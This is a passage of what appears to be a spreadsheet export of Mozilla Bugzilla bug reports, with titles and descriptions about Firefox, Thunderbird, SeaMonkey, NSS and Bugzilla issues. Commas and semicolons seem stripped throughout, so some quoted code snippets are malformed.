    <t>Arkia (Israeli airline) blocks Mozilla and uses incorrect JavaScript.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-57323</t>
  </si>
  <si>
    <t>create mozilla.accessibility newsgroup</t>
  </si>
  <si>
    <t>please create a new newsgroup/mailing list pair for mozilla.accessibility.
Aaron before this can be done you need to give a one line description
of the newsgroup for use by the news server as well as a description
for the newsgroup listing on http://mozilla.org/community.html. The
description for the community page can be the same as the other or a 
short paragraph.</t>
  </si>
  <si>
    <t>marki</t>
  </si>
  <si>
    <t>FIREFOX-381217</t>
  </si>
  <si>
    <t>places exported bookmarks.html missing classic This is an automatically generated file HTML comment</t>
  </si>
  <si>
    <t>places exported bookmarks.html missing classic This is an automatically generated file HTML comment
usually we have:
&lt;!-- This is an automatically generated file.
     It will be read and overwritten.
     DO NOT EDIT! --&gt;
Not sure who out there depends on that but someone might assuming there wasn't a good reason to remove it.</t>
  </si>
  <si>
    <t>CORE-363329</t>
  </si>
  <si>
    <t>[reflow branch] Cell in table with colspan is too wide</t>
  </si>
  <si>
    <t>Table with colspan is too wide.
Before you dupe this against bug 363150 I should say that it also occurs
in my debug build which has that patch. Sorry if it's already known
but I thought I should let you know since it's a regression for rather
simple markup.
At the URL you can see the problem when clicking in the navigation menu
on the left.
STEPS TO REPRODUCE
1. load the attached testcase
  Produkte
  ebuWings
ACTUAL RESULTS
The first cell in the second row is wider than it used to be before
the reflow branch landing.
EXPECTED RESULT
First cell in 2nd row should be about the width of an x.
Compare IE7 Opera9 Webkit and Firefox until 2006120701.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-477120</t>
  </si>
  <si>
    <t>https cookie headers are stripped.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.3 (.NET CLR 3.5.30729)
Build Identifier: 
Thunderbird has this odd habit of stripping cookie headers from https based content. The problem is that it prevents logging into various sites that use https (like feedburner medic feeds and https websites).
Currently the only way to get around this bug is to create a cookie via firefox and then copy it to Thunderbird. This is very advanced for most users and isn't a desirable option.
Ron the author of CS Lite was the one who discovered this issue and shared it with me (with some details). I can supply some more details via my tests but he would be more knowledgeable on the issue.
Reproducible: Sometimes
Steps to Reproduce:
1. (Optional) Install CS Lite
2. Go to https site (ThunderBrowse) or add a https feed (Feedburner)
3. Prompt to login
4. Login looks like a success but when you go to access the content it fails.
Actual Results:  
Cookie headers are not sent
Expected Results:  
Hope to be logged in via cookies from headers.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-322172</t>
  </si>
  <si>
    <t>bump copyright year to 2006</t>
  </si>
  <si>
    <t>We need to bump the copyright year from 2005 to 2006 in way too many places on way too many branches.
I've done one part of it on the trunk but there's way more of this than I expected and I'm not going to finish.</t>
  </si>
  <si>
    <t>SEAMONKEY-459589</t>
  </si>
  <si>
    <t>Dead link to CA listings at netscape.com</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1b2pre) Gecko/20081011 SeaMonkey/2.0a2pre reconfigured by user.js v1.1
Build Identifier:  
http://mxr.mozilla.org/comm-central/source/suite/locales/en-US/chrome/common/help/using_certs_help.xhtml#67
Above is a link to https://certs.netscape.com/ which just returns an error. The resource is no longer there.
Reproducible: Always</t>
  </si>
  <si>
    <t>seamonkey</t>
  </si>
  <si>
    <t>CORE-208111</t>
  </si>
  <si>
    <t>remove nsIDocument::GetArena</t>
  </si>
  <si>
    <t>nsIDocument::GetArena is unused. Patch for removal forthcoming.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-395530</t>
  </si>
  <si>
    <t>tb180-win32-tbox is hung</t>
  </si>
  <si>
    <t>Started building what should have been an 80 minute depend build 18.5 hours ago. Possibly related (or not) to bug 395529.</t>
  </si>
  <si>
    <t>FIREFOX-412017</t>
  </si>
  <si>
    <t>[RTL][GTK] Native themed location bar (drop down button) looks bad on RTL layout</t>
  </si>
  <si>
    <t>Created attachment 296631
fix RTL layout of location bar
When bug 405210 gets fixed the location bar drop down button will be themed natively on GTK. The text field has an open end towards the drop down button so the drop down button looks attached to the text field. However on RTL layouts the drop down button will be positioned to the left of the location bar and the text field itself will have an open end towards the right (into nothing) because its styled direction is LTR.
This patch fixes this by moving the styled LTR direction (which is needed for a correct text layout in the location bar) one child node further.
This causes the buttons and favicons in the location bar to switch place I don't know if that is correct layout but what gave me the idea that this might be the best solution is that the RTL Go button gets used which at the moment is not the case.
There are however other solutions of which I will attach a screenshot.</t>
  </si>
  <si>
    <t>CALENDAR-245171</t>
  </si>
  <si>
    <t>event dialog: hitting return in changed date field does not update date</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040514
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040514
If you edit an event just to change the date if you hit return after editing
the start date without leaving the date field the date is not changed.
Reproducible: Always
Steps to Reproduce:
1. edit event (or new event)
2. change start date by typing in date field
3. hit return while cursor is focus is still in date field
Actual Results:  
event has old date
Expected Results:  
event has new date</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-125426</t>
  </si>
  <si>
    <t>Viewer regression testing is broken</t>
  </si>
  <si>
    <t>Running the regression tests in viewer will not flag any bbox (and probably 
other kinds) when there are differences. I haven't run the regression tests for 
at least 5 weeks so this could have been broken that long. We've been plagued 
with false positives for quite a while now we're seeing the flip side.</t>
  </si>
  <si>
    <t>CORE-555881</t>
  </si>
  <si>
    <t>TM: remove dead fields from TraceMonitor</t>
  </si>
  <si>
    <t>Created attachment 435816
patch
They are 'useReservedObjects' and 'reservedObjects'.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-486618</t>
  </si>
  <si>
    <t>Toronto office is offline</t>
  </si>
  <si>
    <t>18:53:17  [10] caadm01.office:PING is CRITICAL: CHECK_NRPE: Socket timeout after 10 seconds.
Confirmed from multiple vantage points on the net traceroutes die at 
e3-15.cx1.nyc1.beanfield.gw1.arbinet.net (via level3)
nyiix-hudson.beanfield.net (via he.net) or
band-x-gw.customer.alter.net (via alter.net)
Looks like Beanfield disconnected from the rest of the net or something.</t>
  </si>
  <si>
    <t>BUGZILLA-405355</t>
  </si>
  <si>
    <t>Move flatten_group_membership() from User.pm to Group.pm</t>
  </si>
  <si>
    <t>flatten_group_membership() is definitely a group subroutine only. It takes a list of group IDs as argument and returns another list of group IDs. Nothing to do with users.</t>
  </si>
  <si>
    <t>arbingersys</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-370917</t>
  </si>
  <si>
    <t>ml / Malayalam</t>
  </si>
  <si>
    <t>Land Malayalam Firefox localization</t>
  </si>
  <si>
    <t>We should get the Malayalam localization landed on the trunk and then branch it.
Joyce you can attach your localization for pre-landing review to this bug.
Filing this bug in Other as the component for Malayalam is not up yet.</t>
  </si>
  <si>
    <t>SEAMONKEY-236003</t>
  </si>
  <si>
    <t>null check missing (seamonkey version of bug 235129)</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-346076</t>
  </si>
  <si>
    <t>Please use correct english.</t>
  </si>
  <si>
    <t>User-Agent:       Opera/9.00 (X11 Linux i686 U en)
Build Identifier: mozilla/webtools/tinderbox2
I need to understand and use tinderbox.  I cannot do that if there are too many grammatical errors everywhere.
Reproducible: Always</t>
  </si>
  <si>
    <t>ldarby</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-403654</t>
  </si>
  <si>
    <t>upgrade sm-mobile02 to RHEL5</t>
  </si>
  <si>
    <t>Please see 388493</t>
  </si>
  <si>
    <t>CORE-237020</t>
  </si>
  <si>
    <t>Implement  and  elements</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7a) Gecko/20040205
Mozilla fails to render use elements.  IE/Adobe and Batik render them as expected.
The use elements references point to elements defined in defs elements.
Reproducible: Always
Steps to Reproduce:
1.Load following svg example-
&lt;svg xmlns=http://www.w3.org/2000/svg
	xmlns:xxlink='http://www.w3.org/1999/xlink'&gt;
	&lt;line id='line2' x1='100' y1='100' x2='300' y2='100'
	style='stroke:redstroke-width:5'/&gt;
&lt;line x1='100' y1='100' x2='300' y2='100'
	style='stroke:bluestroke-width:5'/&gt;
2.
3.
Actual Results:  
Mozilla/SVG renders a single blue horizontal line which is the line element
that is not referred to by a use element.  The expected red line which is
specified usng a use element is not rendered.
Expected Results:  
A second red line should have been rendered.  Batik and IE/Adobe do render both
lines as expected.</t>
  </si>
  <si>
    <t>tpassin</t>
  </si>
  <si>
    <t>CORE-290766</t>
  </si>
  <si>
    <t>QueryInterface usage by SVG frame code</t>
  </si>
  <si>
    <t>From bug 258081 -
  &gt;     nsISVGChildFrame* SVGFrame=nsnull
  &gt;     kid-&gt;QueryInterface(NS_GET_IID(nsISVGChildFrame)(void**)
  Want to file a followup bug on using CallQI in cases like this?  It's a lot
  safer.</t>
  </si>
  <si>
    <t>TOOLKIT-401292</t>
  </si>
  <si>
    <t>application and addon updates fail when Danish Government browser extension is installed</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 da rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 da rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8
TDC Digital Signatur is a solution for logging in to Danish government websites and for communicating with Danish public institutions by e-mail.
There is currently two ways to install the TDC Digital Signatur in Firefox and Thunderbird:
The first method is to export  the user's private certificate to PKCS#12 format and then import it into Firefox's or Thunderbird's certificate store. This method has some serious usability bugs one of them is bug 322617.
Therefore TDC created another installation method where the internal security module is replaced with another module from TDC which can read the user's private certificate from MSCAPI. (I am not exactly sure how that works)
http://mxr.mozilla.org/mozilla1.8/source/toolkit/mozapps/shared/src/badCertHandler.js#59
Firefox and Thunderbird expect the certificate for the update site to be issued by Builtin Object Token. This is not the case when the user has installed the security module from TDC because then the certs are read from the TDC module instead of the built in one.
I am filing this under Software Update but this could just as well be fixed by fixing the usability bugs in the first install method above so that users won't have to install the security module from TDC.
Bug report and workaround in Danish:
http://forum.mozilladanmark.dk/viewtopic.php?p=17434
Reproducible: Didn't try
Steps to Reproduce:
1. Click Help -&gt; Check for updates
Actual Results:  
Get error message AUS: Update XML File Not Found (404)
Expected Results:  
Update checking succeeded</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-508830</t>
  </si>
  <si>
    <t>Merge dd-bugzilla@davedash.com with dd@mozilla.com or delete dd-bugzilla@davedash.com</t>
  </si>
  <si>
    <t>Please merge my dd-bugzilla@davedash.com account into my dd@mozilla.com.  Or delete dd-bugzilla@davedash.com.
I want just one account for bugzilla.
Thanks.</t>
  </si>
  <si>
    <t>TOOLKIT-402610</t>
  </si>
  <si>
    <t>support redirected chunk data in safebrowsing updates</t>
  </si>
  <si>
    <t>Google is considering updating the safebrowsing protocol to allow inline chunk data to be replaced with a URL for the chunk data.
We'll need to update the url-classifier service to deal with that correctly.</t>
  </si>
  <si>
    <t>WEBSITES-402474</t>
  </si>
  <si>
    <t>Add Edward Lee (Mardak)'s blog to planet</t>
  </si>
  <si>
    <t>Edward Lee (Mardak on IRC) - Summer 2007 Mozilla/ActionMonkey intern now starting the Ph.D. program at UIUC yet somehow manages to find time to work on Download Manager</t>
  </si>
  <si>
    <t>NSS-336937</t>
  </si>
  <si>
    <t>Coverity 171 dead code in mozilla/security/nss/lib/softoken/pcertdb.c</t>
  </si>
  <si>
    <t>AddNicknameToSubject()
{
// check for NUll is done at top of routine
    if ( nickname == NULL ) {
	return(SECFailure)
    }
This later check is not needed since the variable does not get changed
diff -r1.53 pcertdb.c
27972798c2797
nickname = (nickname) ?
common.arena nickname) : NULL
---
&gt;     entry-&gt;nickname = PORT_ArenaStrdup(entry-&gt;common.arena nickname)</t>
  </si>
  <si>
    <t>jonsmirl</t>
  </si>
  <si>
    <t>THUNDERBIRD-522096</t>
  </si>
  <si>
    <t>[autoconfig] wrong popup on Username in account test</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.1 de-DE rv:1.9.3a1pre) Gecko/20091013 Minefield/3.7a1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.1 en-US rv:1.9.1.5pre) Gecko/20091013 Lightning/1.0pre Shredder/3.0pre
The popup on the green bubble of Username says: 'Congratulations! This is a secure server.'. Username has nothing to do if the server is secure or not. It would be better if the popup says something like 'Username exists' or no popup appears.
Reproducible: Always
Steps to Reproduce:
1. Open account autoconfig
2. Enter some entrys
3. Let's the account test
Actual Results:  
Wrong popup as in image in attachment is viewable
Expected Results:  
Appropriate text in popup or no popup</t>
  </si>
  <si>
    <t>FIREFOX-328132</t>
  </si>
  <si>
    <t>embedded Windows Media Player won't play at all on x64 or in full screen by default on xp</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Please try the url in IE or Netscape because they both work correctly. Netscape is even identical code.  Please view page source near the bottom for info. In windows XP full screen video is not possible by default in Firefox.  It only works if you double click.  Also I realize you probably aren't supporting windows x64 but again both netscape and IE work correctly on x64.  Firefox refuses to play completely.  I love firefox thanks in advance!
Reproducible: Always
Steps to Reproduce:
1.Try Netscape or IE...works correctly.
2.Try Firefox....doesn't work(not fullscreen on XP)(doesn't play at all on x64)
3.Nuff said.
Actual Results:  
please see above
Expected Results:  
please see above
opera doesn't work either if it's any consolation :)</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-250864</t>
  </si>
  <si>
    <t>Right-to-Left support for Chatzilla</t>
  </si>
  <si>
    <t>Like most IRC clients Chatzilla currently only supports Left-to-Right paragraph
direction. Adding an option for Right-to-Left is very likely to be a killer
feature among many BiDi users (e.g. Hebrew and Arabic). 
Open issues:
1. Should switching between RTL and LTR be command or GUI-based? Note that when
the input line is RTL it may be confusing to switch back to LTR using a
command since the / ends up on the wrong side of the sentence.
2. If BiDi is implemented using GUI which context menus should include this
option? IMHO the Tab-menu and contentarea-menu are prime candidates.
3. Should the direction of the content area and the input line be linked? To
simplify things I believe that they should.
Prog.</t>
  </si>
  <si>
    <t>CORE-220672</t>
  </si>
  <si>
    <t>consider nsIUTF8StringEnumerator for nsIEncodedChannel</t>
  </si>
  <si>
    <t>As nsIEncodedChannel::contentEncodings is really just a list of strings using
nsIUTF8StringEnumerator would be more friendly for callers of this interface.
http://lxr.mozilla.org/seamonkey/source/xpcom/ds/nsIStringEnumerator.idl#52</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-152346</t>
  </si>
  <si>
    <t>soundvillage.it - ActiveX shockwave web page</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 it-IT rv:1.1a) Gecko/20020615
BuildID:    2002061504
This page is made in Shockwave but even if the plugin is installed it run only
on Explorer...
Reproducible: Always
Steps to Reproduce:
1.install Macromedia Shockwave (with crossover plugin if you want -) )
2.simply digit the url www.soundvillage.it
3.click enter link
Actual Results:  two big black areas
Expected Results:  shockwave animated menus and images</t>
  </si>
  <si>
    <t>aytharn</t>
  </si>
  <si>
    <t>CORE-514570</t>
  </si>
  <si>
    <t>ES5 strict mode: this not generally coerced to an object</t>
  </si>
  <si>
    <t>From ES5 Annex C:
If this is evaluated within strict mode code then the this value is not coerced to an object. A this value of null or undefined is not converted to the global object and primitive values are not converted to wrapper objects. The this value passed via a function call (including calls made using Function.prototype.apply and Function.prototype.call) do not coerce the passed this value to an object (10.4.3 11.1.1 15.3.4.3 15.3.4.4).
It seems like bug 412571 covers part of this but not every case.</t>
  </si>
  <si>
    <t>CORE-365001</t>
  </si>
  <si>
    <t>dotted/dashed border on tall page causes overflow</t>
  </si>
  <si>
    <t>On Trunk Builds i see a broken Layout on the Text on http://meta.wikimedia.org/wiki/IRC_channel_quotes
(see following screenshot)
The Text is covered with a kind of blue lines. Its not every time on the same point on this page. 
The Error Console shows only :
Warning: Unknown property 'text-size'.  Declaration dropped.
Source File: http://meta.wikimedia.org/wiki/IRC_channel_quotes
Line: 0
I was currently not able to find a regression range but it seems this regressed since a long time ago.
Also works on 1509 and Firefox 2001 but failed on Trunk Builds on Windows and Linux.</t>
  </si>
  <si>
    <t>BUGZILLA-451801</t>
  </si>
  <si>
    <t>The word Severity is hard coded not all pages use field_descs.bug_severity</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.10) Gecko/20070223 CentOS/1.5.0.10-0.1.el4.centos Firefox/1.5.0.10
Build Identifier: 
Several files have Severity hard coded in the HTML:
template/en/default/list/edit-multiple.html.tmpl
template/en/default/pages/fields.html.tmpl
template/en/default/pages/quicksearchhack.html.tmpl
template/en/default/bug/create/create.html.tmpl
template/en/default/bug/create/create-guided.html.tmpl
template/en/default/bug/edit.html.tmpl
template/en/default/search/form.html.tmp
template/en/default/reports/duplicates-table.html.tmpl
All references to Severity should be replaced with:
    [% field_descs.bug_severity FILTER html %]
Reproducible: Always
Steps to Reproduce:
1. Change Severity in template/en/default/global/field-descs.none.tmpl
2. Run checksetup.pl (to compile the templates)
3. Go to any page referenced above eg. create a new bug.
      It will still say Severity not what ever you changed it to in field-descs.</t>
  </si>
  <si>
    <t>craig5</t>
  </si>
  <si>
    <t>CORE-108303</t>
  </si>
  <si>
    <t>[XUL Syntax] Change for attr to control</t>
  </si>
  <si>
    <t>Just like it says on the label.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-486567</t>
  </si>
  <si>
    <t>unify the try server code with the existing BuildFactory's</t>
  </si>
  <si>
    <t>Almost every single time a feature or bugfix is deployed to moz2-master the try server does not get it for some time. Sometimes days weeks or even months later. Right now a prime example of this is crashstacks.
These days it should be relatively easy to unify the try code with the existing factories we have. Try will probably need a bit of subclassing to deal with properly displaying information and working with patches via the web interface but on the whole it should be mostly the same.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-453612</t>
  </si>
  <si>
    <t xml:space="preserve">Hg Account Request -  Dirkjan Ochtman </t>
  </si>
  <si>
    <t>It would be helpful if I had push access for stuff like hgpoller/hg_templates. What do I need to go through to get those? Not sure http://www.mozilla.org/hacking/committer/ applies for stuff like this.</t>
  </si>
  <si>
    <t>NSS-536640</t>
  </si>
  <si>
    <t>valgrind warning in DecodeItem (about uninitialized local from nsslowkey_DecodePW)</t>
  </si>
  <si>
    <t>An invocation of certutil that's used in the automated testing harnesses that we use for testing Firefox causes a valgrind warning about use of uninitialized data.
Steps to reproduce (using the version of NSS currently on mozilla-central which seems to be NSS 3.12.4 with some additional patches) are (in the dist/bin directory which holds certutil and the NSS libraries):
rm -rf tmpdir
mkdir tmpdir
echo &gt; tmpdir/.crtdbpw
LD_LIBRARY_PATH=. valgrind --tool=memcheck --leak-check=no --track-origins=yes \
  --num-callers=50 ./certutil -N -d ./tmpdir -f ./tmpdir/.crtdbpw
These steps yield the warning:
==17919== Conditional jump or move depends on uninitialised value(s)
==17919==    at 0x5644C5E: DecodeItem (quickder.c:827)
==17919==    by 0x56441C5: DecodeSequence (quickder.c:402)
==17919==    by 0x5644BA8: DecodeItem (quickder.c:809)
==17919==    by 0x5644DCC: SEC_QuickDERDecodeItem_Util (quickder.c:902)
==17919==    by 0x71D7F22: nsslowkey_DecodePW (keydb.c:1313)
==17919==    by 0x71D82D6: nsslowkey_PutPWCheckEntry (keydb.c:1440)
==17919==    by 0x71D97DD: lg_PutMetaData (keydb.c:2255)
==17919==    by 0x6A7B2DA: sftkdb_ChangePassword (sftkpwd.c:1264)
==17919==    by 0x6A56EE4: NSC_InitPIN (pkcs11.c:3254)
==17919==    by 0x52EA038: PK11_InitPin (pk11auth.c:449)
==17919==    by 0x41283A: SECU_ChangePW2 (secutil.c:442)
==17919==    by 0x40F6CF: certutil_main (certutil.c:2418)
==17919==    by 0x410ED2: main (certutil.c:2981)
==17919==  Uninitialised value was created by a stack allocation
==17919==    at 0x71D7E66: nsslowkey_DecodePW (keydb.c:1292)
The particular variable that's uninitialized is param.iter.type in the function nsslowkey_DecodePW.</t>
  </si>
  <si>
    <t>CORE-226099</t>
  </si>
  <si>
    <t>[RFE] Highlight  in View Source</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5) Gecko/20031007
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5) Gecko/20031007
The opening and closing markup of a CDATA section should be highlighted in the
View Source window.
Reproducible: Always
Steps to Reproduce:
1. Open XML/XHTML page containing a CDATA section.
2. View the source.
Actual Results:  
Source window opens with the  markup in the same colour as
regular text making it harder to distinguish.
Expected Results:  
 should be highlighted.</t>
  </si>
  <si>
    <t>levertond</t>
  </si>
  <si>
    <t>CORE-369568</t>
  </si>
  <si>
    <t>filter.href triggers ASSERTION: hmm? CanCallNow failed in XPCWrappedNative::CallMethod. We are finding out about this late!</t>
  </si>
  <si>
    <t>Created attachment 254241
testcase
###!!! ASSERTION: hmm? CanCallNow failed in XPCWrappedNative::CallMethod. We are finding out about this late!: 'rv == NS_ERROR_XPC_SECURITY_MANAGER_VETO' file mozilla/js/src/xpconnect/src/xpcwrappednative.cpp line 1783
JavaScript error:  line 0: uncaught exception: [Exception... Component does not have requested interface [nsIDOMSVGURIReference.href]  nsresult: 0x80004002 (NS_NOINTERFACE)  location: JS frame :: filtt.svg :: boom :: line 6  data: no]</t>
  </si>
  <si>
    <t>CORE-463958</t>
  </si>
  <si>
    <t>Remove nsEventStateManager::ForceViewUpdate</t>
  </si>
  <si>
    <t>Created attachment 347215
proposed patch
With Steven's patch for bug 428070 scrolling the testcase is
pretty good. However now Shark shows 
nsEventStateManager::ForceViewUpdate in the profile when scrolling
the page using mousewheel.
I think we could just remove the method.
I tested normal pages and also about:config and other xul:trees in the UI.
Seems like bryner added that method year 2000 to fix some xul:tree problems.
Unfortunately the commit message doesn't contain link to the bug.
I guess the relevant bug is bug 43710 (no patches there :( ).
With this change and bug 428070
http://news.opensuse.org/2007/10/04/announcing-opensuse-103-gm/
becomes pretty fast to scroll even with mousewheel on OSX.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-389218</t>
  </si>
  <si>
    <t>Version/config bumps for Fx 2006</t>
  </si>
  <si>
    <t>Tracking bug for version and config bumps for the Firefox 2.0.0.6 release.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-207362</t>
  </si>
  <si>
    <t>rgj.com - Article shown in NS4.8  but not in Mozilla 1.4b - 2003052708</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.4b) Gecko/20030527
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.4b) Gecko/20030527
Mozilla shows title in Mozilla Titlebar and in Tab-Title the browser window
shows only the top ad and directly below the footer ad but no article or side
ads in between. Netscape 4.8 displays without problems.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
DonÂ´t know if itÂ´s an inportant gazette I was there just by chance following a
link.</t>
  </si>
  <si>
    <t>CORE-472461</t>
  </si>
  <si>
    <t>TM: jsgc.cpp fails to compile with !JS_TRACER</t>
  </si>
  <si>
    <t>The changes for bug 462021 broke single-threaded builds:
/home/igor/m/tm/js/src/jsgc.cpp: In function 'void* js_NewGCThing(JSContext* uintN size_t)':
/home/igor/m/tm/js/src/jsgc.cpp:1830: error: label 'testReservedObjects' used but not defined</t>
  </si>
  <si>
    <t>SEAMONKEY-270128</t>
  </si>
  <si>
    <t>keyboard cannot be used for text entry if address bar history entry is selected with mouse while pulldown menu is active from hotkey</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20040910
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20040910
Refer to steps/results
Reproducible: Always
Steps to Reproduce:
1. Hit alt-d to jump to address bar (or whatever method you want to put focus on
address bar).
2. Type anything in address bar to cause address bar history (if any) and
search google to appear.  Do not press enter.
3. Hit alt-g or any other alt-hotkey (FEVGBTWH) to open a pulldown menu.
4. Use mouse to select (left click) something from opened address bar history
(either a url or search google option)
Actual Results:  
No navigation results and the keyboard now cannot be used to enter text.  This
includes both in selecting/typing in the address bar and typing text in any
forms that the browser window may coincidentally be displaying.  Hotkeys (alt-
and ctrl- selections) can still be used except for alt-d.
Switching the focus off the browser window and then back to the browser window
will clear this problem.
Expected Results:  
The usual magic. -)</t>
  </si>
  <si>
    <t>forum</t>
  </si>
  <si>
    <t>CORE-296528</t>
  </si>
  <si>
    <t>Dragging file from Windows Explorer FTP into Firefox deletes the file.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0 .NET CLR 1.1.4322 .NET CLR 1.0.3705)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
When I drag a file from an FTP site (that I have read/write access to) into 
Mozilla Firefox it deletes it from the FTP without asking!!!  This has 
happened with any version of Firefox I have used.
Reproducible: Always
Steps to Reproduce:
1. Log into an FTP site using either Windows Explorer or Internet Explorer
2. Find a file that you wish to view in Firefox
3. Drag the file from the Explorer window into Firefox
4. Watch your file disappear from Explorer!
5. Refresh the Explorer window and the file is not there.  It has been deleted 
off the server.
Actual Results:  
The file was deleted off the FTP
Expected Results:  
If I drag a local file from my hard drive into Firefox it loads it.  If I run 
IE and drag a file from an FTP into it it loads the page from the FTP.  This 
is what Firefox should do too.  I have no problem logging in a second time to 
the FTP through Firefox...I just don't like it deleting my files :).</t>
  </si>
  <si>
    <t>jcoutch</t>
  </si>
  <si>
    <t>THUNDERBIRD-214136</t>
  </si>
  <si>
    <t>Close all windows  then cannot reopen window</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5a) Gecko/20030715 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5a) Gecko/20030715 Mozilla Firebird/0.6
On MacOSX 10.2.6 and Thunderbird(20030727)
When close all window of Thunderbird menu list changes like Mozilla.
For example
File-&gt;New-&gt;Navigator windowNavigator Tab...
Window-&gt;NavigatorComposer(Composer launched like Mozilla)
But no menu item for reopen windowif I want to reopen window then 
I should restart Thunderbird. 
similary as Bug-org 192014
Reproducible: Always
Steps to Reproduce:
1.close all window of Thunderbird
2.
3.
Actual Results:  
No menu for reopen main window
Expected Results:  
reopen main windos from [window] menu.</t>
  </si>
  <si>
    <t>ttn7r5h23j</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-385318</t>
  </si>
  <si>
    <t>AMO Localization (hu)</t>
  </si>
  <si>
    <t>Created attachment 269191
Hungarian (hu) translation of AMO
Please find attached Hungarian translation of AMO.</t>
  </si>
  <si>
    <t>CORE-133657</t>
  </si>
  <si>
    <t>nsISupportsVoid should have/use [noscript] attribute voidPtr data</t>
  </si>
  <si>
    <t>attachment 76244 change nsISupportsVoid 
attachment 76251 fix caller
I was trying to setup an nsISupportsVoid consumer when i ran across that 
comment.</t>
  </si>
  <si>
    <t>CORE-118235</t>
  </si>
  <si>
    <t>The use of set.timeout with Javascript to make animated MouseOvers doesn't work with this Build. It only shows the first and the last picture</t>
  </si>
  <si>
    <t xml:space="preserve">From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9.7) Gecko/20011221
BuildID:    2001122106
I use the following JavaScript Function to make animated Mousovers:
function buttonswitchon1() {
if (document.images) {
setTimeout('document.button1.src = action[1].src'50)
setTimeout('document.button1.src = action[2].src'100)
setTimeout('document.button1.src = action[3].src'150)
setTimeout('document.button1.src = action[4].src'200) }}
However Mozilla only shows the last picture instead of all four. It should
show you the pictures after the timeout to make it look like an animation. It
works fine with IE 5.0 SP2 NS 6.1 Opera 6.0 NS 4.75. It seems that Mozilla
tries to load the other images when I go over a button. But I force preloading.
Reproducible: Always
Steps to Reproduce:
1. Start Mozilla
2. Go to www.hypothraxer.net/pu3
3. Go over a button and watch that only one picture is shown.
Actual Results:  Instead of an animation you get only one picture.
Expected Results:  The Button should fade out smoothly (in a animation).
The whole JavaScript (whitout the 20 other Functions ) ):
&lt;!--DocOzone's Javascript code copyright 1997
//  Feel free to borrow and modify this javascript 
//  but be sure leave this credit in the source!  
//  (Please note the CODE not the images! :)  
//  Your pal   -Dr. Thaddeus Ozone-    
//        http://www.ozones.com/
//
//
Additional Source Code by David Hypothraxer Novak
//
	  http://www.hypothraxer.net
// Following Lines are cut off from a JavaScript of Robert W. Husted
(husted@netscape.com)
// Thanks Mr. Husted
nav3plus = false
if (navigator.userAgent.indexOf (Mozilla) != -1) {
  nav3plus = parseInt(navigator.appVersion.substring(01)) &gt;= 3
}
else {
if (navigator.userAgent.indexOf (Opera) != -1) {
  nav3plus = parseInt(navigator.appVersion.substring(01)) &gt;= 3
 }
}
// End of Thank you
// end error trapping code
// begin action-mouseover code
with (document.images) {
  if (nav3plus) {
        action = new Array(9)
for (m=0 m&lt;=8 m++) { 
